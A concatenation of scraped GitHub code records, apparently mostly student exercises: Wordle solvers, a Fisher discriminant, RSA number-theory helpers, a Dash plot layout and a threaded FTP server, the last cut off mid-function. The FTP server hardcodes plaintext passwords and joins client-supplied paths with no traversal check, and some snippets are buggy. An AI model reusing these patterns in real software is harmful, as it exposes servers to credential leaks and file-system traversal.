<First_Name> Reeves, whose name means <Adjective> <Noun> over the <Noun> in Hawaiian, <Verb> for a living.\"\nsentence2 = \"<Hero> <Verb> in the <Noun> and then <Verb> the <Noun> later.\"\nsentence3 = \"<First_Name> eats a <Noun> before he goes to <Noun> . It was there, where he encountered his enemy <Hero> , and then <Verb> for the entire day.\"\n\nd= {}\nd[\"First_Name\"] = [\"Keanu\", \"Charles\", \"Agatha\", \"Leslie\"]\nd[\"Adjective\"] = [\"dead\", \"metal\", \"massive\", \"blue\"]\nd[\"Noun\"] = [\"tank\", \"sky\", \"kitty\", \"jaguar\", \"mountain\", \"karate\", \"weeds\", \"wolf\"]\nd[\"Verb\"] = [\"meditates\", \"acts\", \"jumps\", \"explodes\", \"ate\", \"ran\"]\nd[\"Hero\"] = [\"Superman\", \"Wonder-Woman\", \"Batman\", \"Thor\", \"Spiderman\"]\n\ndef madlibs(s, dict):\n    new_sentence = []\n    hero_name = random.choice(d[\"Hero\"])\n    for item in s.split():\n        if item == \"<First_Name>\":\n            new_sentence.append(random.choice(dict[\"First_Name\"]))\n        elif item == \"<Adjective>\":\n            new_sentence.append(random.choice(dict[\"Adjective\"]))\n        elif item == \"<Noun>\":\n            new_sentence.append(random.choice(dict[\"Noun\"]))\n        elif item == \"<Verb>\":\n            new_sentence.append(random.choice(dict[\"Verb\"]))\n        elif item == \"<Hero>\":\n            new_sentence.append(hero_name)\n        else:\n            new_sentence.append(item)\n    return \" \".join(new_sentence)\n\nprint(madlibs(sentence, d))\nprint(madlibs(sentence2, d))\nprint(madlibs(sentence3, d))","repo_name":"Kushendra1/csci127-assignments","sub_path":"hw_07/madlib.py","file_name":"madlib.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1132747076","text":"from AvailibleWords import AvailibleWords\nfrom WordleGameEngine import WorldeGameEngine\n\nimport statistics\n\ndef get_all_words():\n    all_words_file = open(\"dictionary.txt\", \"rt\")\n    all_words = all_words_file.readlines()\n    
Your age is {age}\")\n\n\nprint(\"Start\")\nname(\"Syam\", 30)\nname(age=27, name=\"sarath\")\nprint('Stop')'''\n\n# Return statement\n\n\n'''def square(number):\n print(number * number)\n\nsquare(3)'''\n\n\n'''def emogi_converter(message):\n words = message.split(' ')\n emojis = {\n \":)\": \"😊\",\n \":(\": \"😒\"\n }\n output = \" \"\n for word in words:\n output = output + emojis.get(word, word) + \" \"\n return output\n\n\nmessage = input(\">\")\n\nprint(emogi_converter(message))'''\n\n# Exception\ntry:\n age = int(input(\"Age : \"))\n income = 20000\n risk = income / age\n print(age)\nexcept ZeroDivisionError:\n print(\"Age cannot be zero\")\nexcept ValueError:\n print(\"Invalid value\")\n\n\n\n\n\n","repo_name":"Sarathbabu0108/Learn_Python_Tutorial2","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33141562860","text":"import urllib.request, urllib.parse, urllib.error\nimport re\nfhand= urllib.request.urlopen('http://py4e-data.dr-chuck.net/comments_42.html')\nx=list()\n\ndic= dict()\n\nfor line in fhand:\n line= line.decode()\n print(line)\n y= line.split('0-9')\n w= re.findall('[0-9+]', y)\n print(w)\n #type(y)\n","repo_name":"uwaiseibna/pythonall","sub_path":"url1.py","file_name":"url1.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35834669814","text":"import random\r\nimport time\r\n\r\nimport numpy as np\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef create_points(each_train_num, each_test_num):\r\n '''\r\n 生成训练和测试用的正态分布点\r\n :return:\r\n '''\r\n\r\n a_train = []\r\n b_train = []\r\n a_test = []\r\n b_test = []\r\n\r\n for i in range(0, each_train_num):\r\n # a组训练样本初始化\r\n a_train.append({})\r\n a_train[i]['x1'] = np.random.normal(loc = -5.0, scale = 1.0)\r\n a_train[i]['x2'] = np.random.normal(loc = 0.0, scale = 1.0)\r\n a_train[i]['bias'] = 1\r\n a_train[i]['y'] = 1\r\n a_train[i]['y_'] = 0\r\n\r\n # b组训练样本初始化\r\n b_train.append({})\r\n b_train[i]['x1'] = np.random.normal(loc = 0.0, scale = 1.0)\r\n b_train[i]['x2'] = np.random.normal(loc = 5.0, scale = 1.0)\r\n b_train[i]['bias'] = 1\r\n b_train[i]['y'] = -1\r\n b_train[i]['y_'] = 0\r\n\r\n for i in range(0, each_test_num):\r\n # a组测试样本初始化\r\n a_test.append({})\r\n a_test[i]['x1'] = np.random.normal(loc = -5.0, scale = 1.0)\r\n a_test[i]['x2'] = np.random.normal(loc = 0.0, scale = 1.0)\r\n a_test[i]['bias'] = 1\r\n a_test[i]['y'] = 1\r\n a_test[i]['y_'] = 0\r\n\r\n # b组测试样本初始化\r\n b_test.append({})\r\n b_test[i]['x1'] = np.random.normal(loc = 0.0, scale = 1.0)\r\n b_test[i]['x2'] = np.random.normal(loc = 5.0, scale = 1.0)\r\n b_test[i]['bias'] = 1\r\n b_test[i]['y'] = -1\r\n b_test[i]['y_'] = 0\r\n\r\n return [a_train, b_train, a_test, b_test]\r\n\r\n\r\ndef get_mv(a_train, b_train):\r\n mv_a = np.array([0.0, 0.0])\r\n mv_b = np.array([0.0, 0.0])\r\n for a in a_train:\r\n mv_a += np.array([a['x1'], a['x2']])\r\n for b in b_train:\r\n mv_b += np.array([b['x1'], b['x2']])\r\n mv_a = mv_a / len(a_train)\r\n mv_b = mv_b / len(b_train)\r\n return [np.mat(mv_a).T, np.mat(mv_b).T]\r\n\r\n\r\ndef get_w_and_s(a_train, b_train, mv_a, mv_b):\r\n segma_a = np.mat([[0.0, 0.0],\r\n [0.0, 0.0]])\r\n segma_b = np.mat([[0.0, 0.0],\r\n [0.0, 0.0]])\r\n sw = np.mat([[0.0, 0.0],\r\n [0.0, 0.0]])\r\n for a in a_train:\r\n segma_a += (np.mat([a['x1'], a['x2']]).T - mv_a) * 
def get_w_and_s(a_train, b_train, mv_a, mv_b):\r\n    segma_a = np.mat([[0.0, 0.0],\r\n                      [0.0, 0.0]])\r\n    segma_b = np.mat([[0.0, 0.0],\r\n                      [0.0, 0.0]])\r\n    sw = np.mat([[0.0, 0.0],\r\n                 [0.0, 0.0]])\r\n    for a in a_train:\r\n        segma_a += (np.mat([a['x1'], a['x2']]).T - mv_a) * (np.mat([a['x1'], a['x2']]).T - mv_a).T\r\n    for b in b_train:\r\n        segma_b += (np.mat([b['x1'], b['x2']]).T - mv_b) * (np.mat([b['x1'], b['x2']]).T - mv_b).T\r\n    sw = segma_a + segma_b\r\n    print(segma_a)\r\n    sw_inverse = sw.I\r\n    w = sw_inverse * (mv_a - mv_b)\r\n    s = w.T * (mv_a + mv_b) / 2  # midpoint threshold (the factor 1/2 was missing)\r\n    print(\"the s= \"+str(s[0,0]))\r\n    return [w, s]\r\n\r\n\r\ndef test(a_test, b_test, w, s):\r\n    acc = 0\r\n    for a in a_test:\r\n        if w.T * np.mat([a['x1'], a['x2']]).T > s:\r\n            a['y_'] = 1\r\n            acc += 1\r\n        else:\r\n            a['y_'] = -1\r\n    for b in b_test:\r\n        if w.T * np.mat([b['x1'], b['x2']]).T > s:\r\n            b['y_'] = 1\r\n        else:\r\n            b['y_'] = -1\r\n            acc += 1\r\n    acc /= (len(a_test) + len(b_test))\r\n    print('test_acc= ' + str(acc))\r\n\r\n\r\ndef get_train_acc():\r\n    acc = 0\r\n    for a in a_train:\r\n        if w.T * np.mat([a['x1'], a['x2']]).T > s:\r\n            a['y_'] = 1\r\n            acc += 1\r\n        else:\r\n            a['y_'] = -1\r\n    for b in b_train:\r\n        if w.T * np.mat([b['x1'], b['x2']]).T > s:\r\n            b['y_'] = 1\r\n        else:\r\n            b['y_'] = -1\r\n            acc += 1\r\n    acc /= (len(a_train) + len(b_train))\r\n    print('train_acc= ' + str(acc))\r\n\r\n\r\ndef draw(w, s):\r\n    for a in a_train:\r\n        plt.scatter(a['x1'], a['x2'], c = 'red', s = 1, label = 'a')\r\n    for b in b_train:\r\n        plt.scatter(b['x1'], b['x2'], c = 'blue', s = 1, label = 'b')\r\n    for a in a_test:\r\n        plt.scatter(a['x1'], a['x2'], c = 'red', s = 20, label = 'a', marker = '+')\r\n    for b in b_test:\r\n        plt.scatter(b['x1'], b['x2'], c = 'blue', s = 20, label = 'b', marker = '+')\r\n    # plt.plot([-5, 5], [-(w[0,0] * (-5) + s[0,0]) / w[1,0], -(w[0,0] * 5 + s[0,0]) / w[1,0]], c = 'green')\r\n    plt.plot([-5, 5], [-(w[0, 0] * 5 + s[0, 0]) / w[1, 0], -(w[0, 0] * (-5) + s[0, 0]) / w[1, 0]],\r\n             c = 'green')  # m[i, j] indexes a single element of a np.mat\r\n    plt.plot([-5, 5], [-(w[0, 0] * (-5) + s[0, 0]) / w[1, 0], -(w[0, 0] * 5 + s[0, 0]) / w[1, 0]], c = 'pink')\r\n\r\n    plt.xlabel(\"x1\", fontdict = {'size': 16})\r\n    plt.ylabel(\"x2\", fontdict = {'size': 16})\r\n    plt.show()\r\n\r\n\r\neach_train_num = 160\r\neach_test_num = 40\r\n\r\n[a_train, b_train, a_test, b_test] = create_points(each_train_num, each_test_num)  # generate training and test data\r\n[mv_a, mv_b] = get_mv(a_train, b_train)  # compute the class mean vectors\r\n[w, s] = get_w_and_s(a_train, b_train, mv_a, mv_b)  # compute w and the threshold s\r\nget_train_acc()\r\ntest(a_test, b_test, w, s)  # measure accuracy on the test data\r\ndraw(w, s)  # plot the result\r\n","repo_name":"Liwen-Xiao/Pattern_Recognization_and_Machine_Learning","sub_path":"Fisher/Fisher.py","file_name":"Fisher.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25587389124","text":"import random\nimport time\n\n# Reduces the power by taking modulo every iteration. Log(exp) runtime.\ndef power_mod(num, exp, mod) : \n    ans = 1\n    num = num % mod \n    while exp > 0: \n        # Check if exp is odd. If it is, multiply num into ans once.\n        if (exp & 1) == 1: \n            ans = (ans * num) % mod\n        # Divide exp by 2\n        exp = exp >> 1 \n        num = (num * num) % mod \n    return ans\n
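\n# Added example: power_mod(2, 10, 1000) == 24, i.e. 2**10 % 1000 == 1024 % 1000, computed with O(log exp) multiplications by square-and-multiply.\n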
\n# Factors all the 2's from num\ndef div_2(num):\n    count = 0\n    # Check if even. If even divide by 2\n    while (num & 1) == 0:\n        num = num >> 1\n        count = count + 1\n    return {'number': num, 'count': count}\n\n# Check if number is probably prime\ndef miller_rabin_test(number, repeat): \n    # Factor all 2's from number-1. (number-1) would be the order of\n    # the unit group mod number, if number were prime.\n    div_result = div_2(number-1)\n    r_power = div_result['count']\n    d_number = div_result['number']\n    # Will repeat the miller-rabin test with pseudorandom numbers \n    # between 2 and number.\n    for count in range(repeat):\n        check_int = random.randrange(2, number)\n        check = power_mod(check_int, d_number, number)\n        mainloop = True\n        if (check == 1) or (check == number-1):\n            continue\n        for inner_count in range(r_power):\n            check = power_mod(check, 2, number)\n            if check == number-1:\n                mainloop = False\n                break\n        if mainloop:\n            return False\n    return True\n\n# This is an implementation of binary gcd recursively\ndef fast_gcd(num1, num2):\n    # If the numbers are the same then GCD is either number\n    if num1 == num2:\n        return num1\n    # If either of the numbers is 0, any number divides 0,\n    # so just return the other number.\n    elif num1 == 0:\n        return num2\n    elif num2 == 0:\n        return num1\n    # If num1 is even and num2 is odd gcd(num1,num2)=gcd((num1)/2,num2)\n    # else if num1 is even and num2 is also even gcd(num1,num2)=\n    # 2*gcd((num1)/2,(num2)/2)\n    elif (num1 & 1) == 0:\n        if (num2 & 1) == 1:\n            return fast_gcd(num1 >> 1, num2)\n        else:\n            return fast_gcd(num1 >> 1, num2 >> 1) << 1\n    # If num1 is odd and num2 is even gcd(num1,num2)=gcd(num1,(num2)/2)\n    elif (num2 & 1) == 0:\n        return fast_gcd(num1, num2 >> 1)\n    # If num1 and num2 are odd and num1 > num2 then \n    # gcd(num1,num2)=gcd((num1-num2)/2, num2)\n    elif num1 > num2:\n        return fast_gcd((num1-num2) >> 1, num2)\n    else:\n        return fast_gcd((num2-num1) >> 1, num1)\n\n# Implementation of binary gcd iteratively\ndef iter_fast_gcd(num1, num2):\n    shift = 0\n    if num1 == 0:\n        return num2\n    elif num2 == 0:\n        return num1\n    else:\n        while ((num1|num2) & 1) == 0:\n            shift += 1\n            num1 >>= 1\n            num2 >>= 1\n        while (num1 & 1) == 0:\n            num1 >>= 1\n        while True:\n            while (num2 & 1) == 0:\n                num2 >>= 1\n            if num1 > num2:\n                temp = num1\n                num1 = num2\n                num2 = temp\n            num2 -= num1\n            if num2 == 0:\n                break\n        return num1 << shift\n\ndef fast_lcm(num1, num2):\n    gcd = iter_fast_gcd(num1,num2)\n    return (num1*num2) // gcd\n\ndef generate_probable_prime(bits):\n    # Generate a probable prime of 'bits' bits\n    rand_int = random.getrandbits(bits)\n    start_time = time.time()\n    # Increment until we find a prime\n    while True:\n        if (rand_int & 1) == 0:\n            rand_int = rand_int + 1\n        # Check if probable prime\n        elif miller_rabin_test(rand_int, 11):\n            break\n        # If it takes more than 10 seconds to find a probable prime\n        # run the function again.\n        elif (time.time() - start_time) > 10:\n            rand_int = generate_probable_prime(bits)\n        else:\n            rand_int = rand_int + 2\n    return rand_int\n\n# Iterative version of extended gcd to find inverse\ndef mod_inverse(num, mod_temp) : \n\tmod = mod_temp\n\ty = 0\n\tx = 1\n\tif (mod == 1) : \n\t\treturn 0\n\twhile (num > 1) : \n\t\tq = num // mod_temp\n\t\tt = mod_temp\n\t\tmod_temp = num % mod_temp\n\t\tnum = t \n\t\tt = y \n\t\ty = x - q * y \n\t\tx = t \n\tif (x < 0) : \n\t\tx = x + mod\n\treturn x \n
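\n# Added example: mod_inverse(3, 11) == 4, since 3 * 4 == 12 == 1 (mod 11) -- the extended-Euclid inverse used, e.g., to derive an RSA private exponent.\n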
","repo_name":"Dweej-Patel/RSA-Encryption","sub_path":"python/number_theory.py","file_name":"number_theory.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1132747076","text":"from AvailibleWords import AvailibleWords\nfrom WordleGameEngine import WorldeGameEngine\n\nimport statistics\n\ndef get_all_words():\n    all_words_file = open(\"dictionary.txt\", \"rt\")\n    all_words = all_words_file.readlines()\n    return [word.strip().lower() for word in all_words]\n\ndef let_us_play(all_words):\n    availible_words = AvailibleWords(all_words)\n    print(\"now let's start\")\n    while len(availible_words) > 1:\n        guess = input(\"what word was guessed\\n\").strip().lower()\n        if len(guess) < 5:\n            if guess == 's':\n                for word in availible_words.words():\n                    print(word)\n                continue\n            if guess == 'q':\n                return 'q'\n            if guess == 'r':\n                return 'r'\n        response = input(\"what did the system respond. b for blank, y for yellow, g for green\\n\").lower().strip()\n\n        availible_words.filter_guess(guess, response)\n        availible_words.words()\n        no_words_left = len(availible_words)\n        print(\"available words left\", no_words_left)\n        if no_words_left < 11:\n            for word in availible_words.words():\n                print(word)\n\n\n    if len(availible_words) == 0:\n        print('seems like we hit an error, exiting program')\n        return 'q'\n    print(\"the word is\", availible_words.words().pop())\n    return 'r'\n
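\n\n# Added example (assuming standard Wordle scoring for the b/y/g responses read above): if the guess were \"crane\" and the secret word \"cargo\", the response would be \"gyybb\" -- 'g' for a letter in place, 'y' for one present elsewhere, 'b' for one absent.\n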
\ndef human_against_gameEngine(all_words):\n    gameEngine = WorldeGameEngine(all_words)\n    word=input(\"would you like to set the word\\n\").strip()\n    if word not in all_words:\n        print(\"invalid word, setting a random one\")\n        word=None\n    gameEngine.set_word_to_guess(word)\n    response = ''\n    while(response != 'ggggg'):\n        guess = input(\"what word would you like to guess\\n\")\n        response = gameEngine.guess(guess)\n        print(\"response was\", response)\n\n\ndef assistant_mode(all_words):\n    availible_words = AvailibleWords(all_words)\n    print(\"Menu: instead of guessing a word, type one of these letters\\n(press enter for the next guess)\\n\\ts to show what words are available\\n\\tq to quit\\n\\tr to restart with a new word\\n\")\n    while (let_us_play(all_words) == 'r'):\n        pass\n\n\ndef self_playing_machine(all_words):\n    availible_words = AvailibleWords(all_words)\n    gameEngine = WorldeGameEngine(all_words)\n    gameEngine.set_word_to_guess()\n    response = ''\n    round = 0\n    while(response != 'ggggg'):\n        if round % 20 == 0 and round != 0:\n            input(\"We just reached %s guesses do you want to continue?\" % (round))\n            print(\"Words left in the pool\", len(availible_words))\n        if len(availible_words) == 0:\n            print(gameEngine.guesses_so_far, gameEngine.secret_word)\n        guess = availible_words.get_next_guess()\n        # print(\"guess was\", guess)\n        response = gameEngine.guess(guess)\n        # print(\"response was\", response)\n        availible_words.filter_guess(guess, response)\n        round+=1\n\n    return gameEngine.guesses_so_far\n\nif __name__ == '__main__':\n    all_words = get_all_words()\n\n    # human_against_gameEngine(all_words)\n    assistant_mode(all_words)\n    # guesses_distribution = set()\n    # total_games = 200\n    # for count in range(total_games):\n    #     guesses = self_playing_machine(all_words)\n    #     # print(guesses)\n    #     guesses_distribution.add(len(guesses))\n    #\n    # print(statistics.mean(guesses_distribution))","repo_name":"zingales/WordleSolver","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42105995933","text":"from __future__ import print_function, division\n\nimport os\nimport json\n\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\n\nfrom sasdash.datamodel import warehouse\n\nfrom .style import XLABEL, YLABEL, TITLE, LINE_STYLE\nfrom .style import AXIS_OPTIONS\nfrom .style import INLINE_LABEL_STYLE, GRAPH_GLOBAL_CONFIG\nfrom ..base import dash_app\n\n_DIFF_OPTIONS = [{\n    'label': 'Relative difference',\n    'value': 'relative_diff',\n}, {\n    'label': 'Absolute difference',\n    'value': 'absolute_diff',\n}, {\n    'label': 'Error',\n    'value': 'error',\n}, {\n    'label': 'Error relative difference',\n    'value': 'error_relative_diff',\n}]\n\n_CALC_FUNCTION = {\n    'relative_diff': lambda x, ref: (x.i - ref.i) / ref.i * 100.0,\n    'absolute_diff': lambda x, ref: x.i - ref.i,\n    'error': lambda x, ref: x.err,\n    'error_relative_diff': lambda x, ref: (x.err - ref.err) / ref.err * 100.0,\n}\n
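\n# Added note: the two *relative* entries above return percentages (hence the 100.0 factor); e.g. x.i == 1.1 against ref.i == 1.0 gives relative_diff == 10.0 (%), while 'absolute_diff' and 'error' stay in intensity units.\n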
\n_DEFAULT_PLOT_TYPE = 'relative_diff'\n\n_DEFAULT_LAYOUT = html.Div(children=[\n    dcc.Graph(\n        id='difference-graph',\n        figure={'data': ()},\n        config=GRAPH_GLOBAL_CONFIG,\n    ),\n    html.Label('Select as base reference:'),\n    dcc.Dropdown(\n        id='difference-ref-selection',\n        options=[],  # populated by the _set_ref_options callback below\n        value=0,\n    ),\n    html.Label('Plot type'),\n    dcc.RadioItems(\n        id='difference-plot-type',\n        options=_DIFF_OPTIONS,\n        value=_DEFAULT_PLOT_TYPE,\n        labelStyle=INLINE_LABEL_STYLE,\n    ),\n    html.Label('X axis type'),\n    dcc.RadioItems(\n        id='difference-xaxis-scale',\n        options=AXIS_OPTIONS,\n        value='linear',\n        labelStyle=INLINE_LABEL_STYLE,\n    ),\n    html.Label('Slider for xlim'),\n    dcc.RangeSlider(\n        id='difference-xlim',\n        # count=1,\n        # disabled=True,\n        min=0.0,\n        max=0.20,\n        step=0.01,\n        value=[0.0, 0.14],\n    ),\n    html.Label('Slider for ylim'),\n    dcc.RangeSlider(\n        id='difference-ylim',\n        min=-150.0,\n        max=150.0,\n        step=1.0,\n        value=[-50.0, 50.0],\n    ),\n    # html.Label('Parameters for smoothing'),\n    # html.Label('window length'),\n    # dcc.Input(\n    #     placeholder='Enter a positive odd integer...', value=25,\n    #     type='number'),\n    # html.Label('Polyorder'),\n    # dcc.Input(\n    #     placeholder='Enter an integer less than window length ...',\n    #     value=5,\n    #     type='number',\n    # ),\n])\n\n\ndef get_series_analysis():\n    return _DEFAULT_LAYOUT\n\n\ndef _get_figure(info, plot_type, ref_idx, xaxis_scale, xlim=None, ylim=None):\n    per_dict = {key: info[key] for key in ('project', 'experiment', 'run')}\n    sasm_list = warehouse.get_sasprofile(**per_dict)\n    if 'diff' in plot_type.lower():\n        ref_sasm = sasm_list[ref_idx]\n    else:\n        ref_sasm = None\n\n    xaxis = dict(title=XLABEL[xaxis_scale], type=xaxis_scale)\n    yaxis = dict(title=YLABEL[plot_type])\n    if xlim:\n        xaxis['range'] = xlim\n    if ylim:\n        yaxis['range'] = ylim\n\n    data = [{\n        'x': each_sasm.q,\n        'y': _CALC_FUNCTION[plot_type](each_sasm, ref_sasm),\n        'type': 'line',\n        'line': LINE_STYLE,\n        'name': each_sasm.get_parameter('filename'),\n    } for each_sasm in sasm_list]\n\n    return {\n        'data': data,\n        'layout': {\n            'height': 500,\n            'hovermode': 'closest',\n            'title': TITLE[plot_type],\n            'xaxis': xaxis,\n            'yaxis': yaxis,\n        },\n    }\n\n\n@dash_app.callback(\n    Output('difference-graph', 'figure'),\n    [\n        Input('difference-plot-type', 'value'),\n        Input('difference-ref-selection', 'value'),\n        Input('difference-xaxis-scale', 'value'),\n        Input('difference-xlim', 'value'),\n        Input('difference-ylim', 'value'),\n        Input('page-info', 'children'),\n    ],\n)\ndef _update_figure(plot_type, ref_idx, xaxis_scale, xlim, ylim, info_json):\n    info_dict = json.loads(info_json)\n    return _get_figure(info_dict, plot_type, ref_idx, xaxis_scale, xlim, ylim)\n\n\n@dash_app.callback(\n    Output('difference-ref-selection', 'options'),\n    [Input('page-info', 'children')])\ndef _set_ref_options(info_json):\n    info = json.loads(info_json)\n    project, experiment, run = info['project'], info['experiment'], info['run']\n    file_list = warehouse.get_files(project, experiment, run,\n                                    'subtracted_files')\n    return [{\n        'label': os.path.basename(each),\n        'value': i,\n    } for i, each in enumerate(file_list)]\n","repo_name":"lqhuang/SAS-dashboard","sub_path":"sasdash/dashboard/layouts/series_analysis.py","file_name":"series_analysis.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27087750081","text":"import string\n\nclass Solution:\n    def uniqueLetterString(self, s: str) -> int:\n        index, rslt = {c:[-1, -1] for c in string.ascii_uppercase}, 0\n        for i, c in enumerate(s):\n            pre, last = index[c]\n            rslt += (i-last)*(last-pre)\n            index[c] = [last, i]\n        n = len(s)\n        for c in index:\n            rslt += (n-index[c][1])*(index[c][1]-index[c][0])\n        return rslt%(10**9+7)\n","repo_name":"Mela2014/lc_punch","sub_path":"lc828_twopointer.py","file_name":"lc828_twopointer.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32486410737","text":"# FTP Server was implemented by Kavilan Nair (1076342) \nimport socket\nimport threading\nimport os\nimport random\nimport platform\n\n# FTP server class that inherits from the threading module\nclass FTPServer (threading.Thread):\n    def __init__(self, connection_socket, address_ip):\n        threading.Thread.__init__(self)\n        # initialise member variables to be used later in the code\n        self.command_connection = connection_socket\n        self.data_connection = None\n        self.address_ip = address_ip\n        self.type = None\n        self.isConnectionTerminated = False\n        self.isActiveMode = None\n        self.cwd = os.getcwd()\n        self.user = ' '\n\n    def run(self):\n        print(\"Connection from: \", str(self.address_ip))\n        self.command_connection.send('220 Welcome to the FTP server\\r\\n'.encode())\n        # infinite loop to continuously receive commands from the client\n        while True:\n            # commands available that have been implemented and can be used by a client\n            commands_available = ['USER', 'PASS', 'PASV', 'LIST', 'PWD', 'CWD', 'TYPE', 'SYST', 'RETR', 'STOR', 'NOOP',\n                                  'QUIT', 'PORT', 'DELE', 'MKD', 'RMD', 'CDUP']\n\n            if self.isConnectionTerminated:\n                break\n\n            # formatting of client commands to split into command and argument\n            client_message = self.command_connection.recv(1024).decode()\n            print(\"From connected client \" + self.user + \": \" + client_message)\n            command = client_message[:4].strip()\n            argument = client_message[4:].strip()\n\n            if command in commands_available:\n                # call function based off string supplied through client command\n                ftp_command = getattr(self, command)\n\n                if argument == '':\n                    ftp_command()\n                else:\n                    ftp_command(argument)\n\n            elif command not in commands_available:\n                self.command_connection.send(\"502 Command not implemented \\r\\n\".encode())\n\n    # Function to handle USER command\n    def USER(self, argument):\n        if argument == \"group18\" or argument == \"group19\":\n            self.user = argument\n            reply = \"331 Please Specify Password\\r\\n\"\n            print('Response sent to connected client ' + self.user + ': ' + reply)\n            self.command_connection.send(reply.encode())\n        else:\n            reply = \"530 Login incorrect\\r\\n\"\n            print('Response sent to connected client ' + self.user + ': ' + reply)\n            self.command_connection.send(reply.encode())\n            self.command_connection.close()\n\n    # Function to handle password associated with username\n    def PASS(self, argument):\n        if (self.user == \"group18\" and argument == \"dan\") or (self.user == \"group19\" and argument == \"mat\"):\n            reply = \"230 Login successful\\r\\n\"\n            print('Response sent to connected client ' + self.user + ': ' + 
reply)\n self.command_connection.send(reply.encode())\n else:\n reply = \"530 Login incorrect\\r\\n\"\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n self.command_connection.close()\n\n # Function to handle passive connection from client\n def PASV(self):\n self.isActiveMode = False\n # Randomly generate port numbers for client to connect to\n port_number1 = random.randint(47, 234)\n port_number2 = random.randint(0, 255)\n server_address = socket.gethostbyname(socket.gethostname())\n # string manipulation to format in appropriate\n server_address = server_address.split(\".\")\n server_address = ','.join(server_address)\n server_address = \"(\" + server_address + \",\" + str(port_number1) + \",\" + str(port_number2) + \")\"\n data_port = (port_number1 * 256) + port_number2\n host = socket.gethostbyname(socket.gethostname())\n try:\n # Attempt to establish data connection\n self.data_connection = self.data_establish(host, data_port)\n reply = \"227 Entering passive mode\" + str(server_address) + '\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n except socket.error:\n reply = \"425 Cannot open Data connection \\r\\n\"\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n # Function to handle active connection to client\n def PORT(self, argument):\n self.isActiveMode = True\n # string handling\n argument = argument.split(',')\n data_host = '.'.join(argument[0:4])\n port_number = argument[-2:]\n data_port = (int(port_number[0]) * 256) + int(port_number[1])\n data_port = int(data_port)\n self.data_connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n # Attempt to establish data connection\n self.data_connection.connect((data_host, data_port))\n reply = \"225 Entering Active mode \\r\\n\"\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n except socket.error:\n reply = \"425 Cannot open Data connection \\r\\n\"\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n # Function to handle directory listing\n def LIST(self):\n reply = \"150 File status okay; about to open data connection.\\r\\n\"\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n if not self.isActiveMode:\n data_sock, data_address = self.data_connection.accept()\n\n directory_list = os.listdir(self.cwd)\n for item in directory_list:\n # Uncomment to see what list contents are being sent\n # print('sending: ' + str(item))\n if not self.isActiveMode:\n data_sock.sendall((str(item) + '\\r\\n').encode())\n else:\n self.data_connection.sendall((str(item) + '\\r\\n').encode())\n\n reply = '226 Closing data connection. 
Requested transfer action successful\\r\\n'\n        print('Response sent to connected client ' + self.user + ': ' + reply)\n        self.command_connection.send(reply.encode())\n\n        if not self.isActiveMode:\n            data_sock.close()\n            self.data_connection.close()\n\n    # Function to return the current working directory\n    def PWD(self):\n        reply = '257' + ' \"' + self.cwd + '\" ' + 'is the working directory\\r\\n'\n        print('Response sent to connected client ' + self.user + ': ' + reply)\n        self.command_connection.send(reply.encode())\n\n    # Function to change the working directory\n    def CWD(self, argument):\n        path = argument\n        new_cwd = self.cwd + '/' + str(path)\n        # only commit the new path if it actually exists\n        if os.path.exists(new_cwd):\n            self.cwd = new_cwd\n            reply = '250 Requested file action okay, completed.\\r\\n'\n            print('Response sent to connected client ' + self.user + ': ' + reply)\n            self.command_connection.send(reply.encode())\n        else:\n            reply = '550 Requested action not taken. File/Directory unavailable\\r\\n'\n            print('Response sent to connected client ' + self.user + ': ' + reply)\n            self.command_connection.send(reply.encode())\n\n    # Function to choose ASCII or Binary mode\n    def TYPE(self, argument):\n        if argument == 'A':\n            reply = '200 ASCII mode enabled\\r\\n'\n            print('Response sent to connected client ' + self.user + ': ' + reply)\n            self.command_connection.send(reply.encode())\n            self.type = 'A'\n        elif argument == 'I':\n            reply = '200 binary mode enabled\\r\\n'\n            print('Response sent to connected client ' + self.user + ': ' + reply)\n            self.command_connection.send(reply.encode())\n            self.type = 'I'\n        else:\n            reply = '501 Syntax error in parameters or arguments\\r\\n'\n            print('Response sent to connected client ' + self.user + ': ' + reply)\n            self.command_connection.send(reply.encode())\n\n    # Function to obtain the operating system\n    def SYST(self):\n        reply = \"215 \" + platform.system() + \"\\r\\n\"\n        print('Response sent to connected client ' + self.user + ': ' + reply)\n        self.command_connection.send(reply.encode())\n\n    # Function to download file from server\n    def RETR(self, argument):\n        reply = '150 File status okay; about to open data connection.\\r\\n'\n        print('Response sent to connected client ' + self.user + ': ' + reply)\n        self.command_connection.send(reply.encode())\n        if not self.isActiveMode:\n            data_sock, data_address = self.data_connection.accept()\n        filename = self.cwd + '/' + argument\n        if self.type == 'A':\n            file = open(filename, 'r')\n            reading = file.read(8192)\n\n            while reading:\n                